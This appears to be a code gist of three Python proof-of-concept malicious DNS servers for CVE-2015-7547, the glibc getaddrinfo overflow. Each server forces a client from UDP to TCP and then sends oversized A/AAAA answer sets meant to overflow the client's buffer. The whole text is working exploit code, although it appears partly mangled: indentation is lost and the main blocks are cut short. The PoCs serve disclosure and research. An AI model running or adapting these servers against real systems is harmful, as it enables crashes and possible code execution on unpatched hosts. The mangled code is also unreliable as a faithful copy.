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Last active January 23, 2021 00:43
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PoCs for CVE-2015-7547 (different attack vectors)
# Copyright 2016 Google Inc
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# See the License for the specific language governing permissions and
# limitations under the License.
# Authors:
# Fermin J. Serna <>
# Gynvael Coldwind <>
# Thomas Garnier <>
# Marek Vavrusa <>
import socket
import time
import struct
import threading
IP = '' # Insert your ip for bind() here...
ANSWERS1 = 184
terminate = False
def dw(x):
return struct.pack('>H', x)
def dd(x):
return struct.pack('>I', x)
def dl(x):
return struct.pack('<Q', x)
def db(x):
return chr(x)
def udp_thread():
global terminate
# Handle UDP requests
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((IP, 53))
counter = -1
while not terminate:
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id_udp = struct.unpack('>H', data[0:2])[0]
query_udp = data[12:]
counter += 1
# Send truncated flag... so it retries over TCP
data = dw(id_udp) # id
data += dw(0x8180 | (counter % 2) * 0x0200) # flags with truncated set
data += dw(1) # questions
data += dw(126) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query_udp # question
# A records in answer
for i in range(126):
answer = dw(0xc00c) # name compressed
answer += dw(1) # type A
answer += dw(1) # class
answer += dd(0) # ttl
answer += dw(4) # data length
answer += chr(i) * 4 # data
data += answer
# Send it right away
sock_udp.sendto(data, addr)
def tcp_thread():
global terminate
counter = -1
#Open TCP socket
sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_tcp.bind((IP, 53))
while not terminate:
conn, addr = sock_tcp.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
while True:
# Read entire packet
reqlen = struct.unpack('>H', conn.recv(2))[0]
print '[TCP] Disconnected'
data = conn.recv(reqlen)
# Parse QUESTION (trim EDNS / additionals ...)
msgid = struct.unpack('>H', data[0:2])[0]
query = data[12:]
endp = 0
while query[endp] != '\x00' and endp < len(query):
endp += ord(query[endp]) + 1 # Traverse QNAME
query = query[0 : endp + 1 + 4] # +QTYPE +QCLASS
print '[TCP] Total Data len recv ' + str(len(data))
# Attack payload
data = dw(msgid) # id
data += dw(0x8180) # flags (QR, RD, AA)
data += dw(1) # questions
data += dw(127) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query # question
# AAAA records in answer
for i in range(127):
answer = dw(0xc00c) # name compressed
answer += dw(28) # type AAAA
answer += dw(1) # class
answer += dd(0) # ttl
answer += dw(16) # data length
answer += chr(i) * 16 # data
data += answer
conn.sendall(dw(len(data)) + data)
if __name__ == "__main__":
t = threading.Thread(target=udp_thread)
t.daemon = True
terminate = True
# Copyright 2016 Google Inc
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# See the License for the specific language governing permissions and
# limitations under the License.
# Authors:
# Fermin J. Serna <>
# Gynvael Coldwind <>
# Thomas Garnier <>
# Marek Vavrusa <>
import socket
import time
import struct
import threading
IP = '' # Insert your ip for bind() here...
terminate = False
def dw(x):
return struct.pack('>H', x)
def dd(x):
return struct.pack('>I', x)
def dl(x):
return struct.pack('<Q', x)
def db(x):
return chr(x)
# Respond with TC=1 to shift over TCP
# This is normal authoritative response with large payload
def udp_thread():
global terminate
# Handle UDP requests
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((IP, 53))
while not terminate:
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id_udp = struct.unpack('>H', data[0:2])[0]
# Parse QUESTION (trim EDNS / additionals ...)
query_udp = data[12:]
endp = 0
while query_udp[endp] != '\x00' and endp < len(query_udp):
endp += ord(query_udp[endp]) + 1 # Traverse QNAME
query_udp = query_udp[0 : endp + 1 + 4] # +QTYPE +QCLASS
qtype = struct.unpack('>H', query_udp[-4:-2])[0]
# Send truncated... so it retries over TCP
data = dw(id_udp) # id
data += dw(0x8380) # flags with truncated set
data += dw(1) # questions
data += dw(0) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query_udp # question
sock_udp.sendto(data, addr)
def tcp_thread():
global terminate
#Open TCP socket
sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_tcp.bind((IP, 53))
counter = 0
while not terminate:
conn, addr = sock_tcp.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
while True:
# Read entire packet
reqlen = struct.unpack('>H', conn.recv(2))[0]
print '[TCP] Disconnected'
data = conn.recv(reqlen)
# Parse QUESTION (trim EDNS / additionals ...)
msgid = struct.unpack('>H', data[0:2])[0]
query = data[12:]
endp = 0
while query[endp] != '\x00' and endp < len(query):
endp += ord(query[endp]) + 1 # Traverse QNAME
query = query[0 : endp + 1 + 4] # +QTYPE +QCLASS
print '[TCP] Total Data len recv ' + str(len(data))
# Plan responses
counter += 1
# First two answers:
# 1. Response length > 2048
# 2. Empty response to force retry
if counter == 1:
data = dw(msgid) # id
data += dw(0x8180) # flags (QR, RD, AA)
data += dw(1) # questions
data += dw(127) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query # question
# A records in answer
for i in range(127):
answer = dw(0xc00c) # name compressed
answer += dw(1) # type A
answer += dw(1) # class
answer += dd(0) # ttl
answer += dw(4) # data length
answer += chr(i) * 4 # data
data += answer
elif counter == 2:
print '[TCP] Severing connection to retry'
data = ''
# Second stage
# 3. Any valid response
# 4. Attack payload
elif counter == 3:
data = dw(msgid) # id
data += dw(0x8180) # flags (QR, RD, AA)
data += dw(1) # questions
data += dw(0) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query # question
elif counter == 4:
data = dw(msgid) # id
data += dw(0x8180) # flags (QR, RD, AA)
data += dw(1) # questions
data += dw(127) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query # question
# AAAA records in answer
for i in range(127):
answer = dw(0xc00c) # name compressed
answer += dw(28) # type AAAA
answer += dw(1) # class
answer += dd(0) # ttl
answer += dw(16) # data length
answer += chr(i) * 16 # data
data += answer
conn.sendall(dw(len(data)) + data)
if __name__ == "__main__":
t = threading.Thread(target=udp_thread)
t.daemon = True
terminate = True
# Copyright 2016 Google Inc
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# See the License for the specific language governing permissions and
# limitations under the License.
# Authors:
# Fermin J. Serna <>
# Gynvael Coldwind <>
# Thomas Garnier <>
# Marek Vavrusa <>
import socket
import time
import struct
IP = '' # Insert your ip for bind() here...
def dw(x):
return struct.pack('>H', x)
def dd(x):
return struct.pack('>I', x)
def dl(x):
return struct.pack('<Q', x)
def db(x):
return chr(x)
def udp_thread():
# Handle UDP requests
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((IP, 53))
# Respond with random 2k responses
while True:
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id_udp = struct.unpack('>H', data[0:2])[0]
# Parse QUESTION (trim EDNS / additionals ...)
query_udp = data[12:]
endp = 0
while query_udp[endp] != '\x00' and endp < len(query_udp):
endp += ord(query_udp[endp]) + 1 # Traverse QNAME
query_udp = query_udp[0 : endp + 1 + 4] # +QTYPE +QCLASS
# Send large response (not truncated, violating 512B limit)
data = dw(id_udp) # id
data += dw(0x8180) # flags (QR, RD, AA)
data += dw(1) # questions
data += dw(124) # answers
data += dw(0) # authoritative
data += dw(1) # additional
data += query_udp # question
# A records in answer
for i in range(124):
answer = dw(0xc00c) # name compressed
answer += dw(1) # type A
answer += dw(1) # class
answer += dd(0) # ttl
answer += dw(4) # data length
answer += chr(i) * 4 # data
data += answer
# Extra TXT in additionals to pad it to 2048 octets
answer = dw(0xc00c) # name compressed
answer += dw(16) # type TXT
answer += dw(1) # class
answer += dd(0) # ttl
answer += dw(16) # data length
answer += chr(15) # TXT length
answer += 'D' * 15 # data
data += answer
print('[UDP] Total Data len sent ' + str(len(data)))
sock_udp.sendto(data, addr)
if __name__ == "__main__":
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